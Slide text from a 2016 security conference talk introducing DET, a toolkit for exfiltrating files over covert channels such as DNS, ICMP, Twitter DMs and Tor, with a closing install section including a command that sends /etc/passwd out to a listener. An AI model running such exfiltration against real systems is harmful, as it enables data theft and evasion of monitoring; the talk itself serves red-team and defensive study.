Introducing DET(Data Exfiltration Toolkit)
Paul Amar - BSides Ljubljana - 09/03/2016
General Approach
TCP
DNS
HTTP
ICMP
SMTP
HammerToss (July 2015)
What’s available today?
And many more... created almost every day.
Not kidding.
Current state
TCP
DNS
HTTP
ICMP
Twitter DMs
SMTP (e.g. Gmail)
Introducing DET
Configuration file (JSON format)
File to exfiltrate
Folder to exfiltrate / multi-threaded
Plugin(s) to use
Plugin(s) to exclude
Server mode
Configuration file
List all your plugins and their configuration
Each plugin has its own configuration (username, pwd, …)
Additional configuration (XOR key, sleeping time, …)
Let’s dig a bit (Client-side)
“Registration” phase 1/2
“Registration” phase 2/2
Sending the data 1/2
Sending the data 2/2
“End” phase 1/2
“End” phase 2/2
So, in a few words...
But wait! There’s moar.
Additional plugins (Tor Integration) 1/2
Source: http://foxglovesecurity.com/2015/11/02/hack-like-the-bad-guys-using-tor-for-firewall-evasion-and-anonymous-remote-access/
Additional plugins (Tor Integration) 2/2
“Experimental” plugins
What’s next
- Port DET *entirely* to PowerShell (plugin-based, “Empire”-like)
- More plugins!
- Data obfuscation layer using Markov Chains
- https://github.com/bwall/markovobfuscate
Installation
Get/install it:
- git clone https://github.com/sensepost/DET
- pip install -r requirements.txt --user (install dependencies for the local user)
Client side:
- python det.py -f /etc/passwd -c ./config.json (or PS scripts)
Server side:
- python det.py -L -c ./config.json